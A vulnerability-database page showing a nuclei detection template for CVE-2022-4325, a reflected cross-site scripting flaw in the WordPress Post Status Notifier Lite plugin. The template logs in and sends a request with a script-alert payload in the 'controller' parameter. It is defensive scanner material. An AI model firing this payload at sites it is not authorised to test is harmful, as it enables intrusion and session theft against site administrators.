Lucene search
K

WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting. Plugin vulnerability allows injection of malicious scripts, leading to data theft and hijackin

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2022-4325
10 Jan 202302:28
circl
CNNVD
WordPress Plugin Post Status Notifier Lite 跨站脚本漏洞
9 Jan 202300:00
cnnvd
CVE
CVE-2022-4325
9 Jan 202322:13
cve
Cvelist
CVE-2022-4325 Post Status Notifier Lite < 1.10.1 - Reflected XSS
9 Jan 202322:13
cvelist
EUVD
EUVD-2022-51678
9 Jan 202322:13
euvd
NVD
CVE-2022-4325
9 Jan 202323:15
nvd
OSV
CVE-2022-4325
9 Jan 202323:15
osv
Prion
Cross site scripting
9 Jan 202323:15
prion
Positive Technologies
PT-2023-14184 · WordPress · Post Status Notifier Lite
9 Jan 202300:00
ptsecurity
RedhatCVE
CVE-2022-4325
23 May 202500:31
redhatcve
Rows per page
id: CVE-2022-4325

info:
  name: WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    WordPress Post Status Notifier Lite plugin before 1.10.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
  remediation: Fixed in version 1.10.1.
  reference:
    - https://wpscan.com/vulnerability/5b983c48-6b05-47cf-85cb-28bbeec17395
    - https://wordpress.org/plugins/post-status-notifier-lite/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4325
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-4325
    cwe-id: CWE-79
    epss-score: 0.00902
    epss-percentile: 0.55333
    cpe: cpe:2.3:a:ifeelweb:post_status_notifier_lite:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ifeelweb
    product: post_status_notifier_lite
    framework: wordpress
  tags: cve,cve2022,wp,wordpress,wpscan,authenticated,xss,wp-plugin,post-status-notifier-lite,ifeelweb,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/options-general.php?page=post-status-notifier-lite&controller=%3Cscript%3Ealert%28%60document.domain%60%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "<script>alert(`document.domain`)</script>")'
          - 'contains(body_2, "Post Status Notifier Lite")'
        condition: and
# digest: 490a0046304402206315cc5adadd612ef14337e9d2fc37ab64ad8f60e84051333faec9f335f3c6e002206966b5ea504f0dc2eefadb7572e9bc18afad8167346607158857e6813e19e087:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.16.1
EPSS0.00902
SSVC
23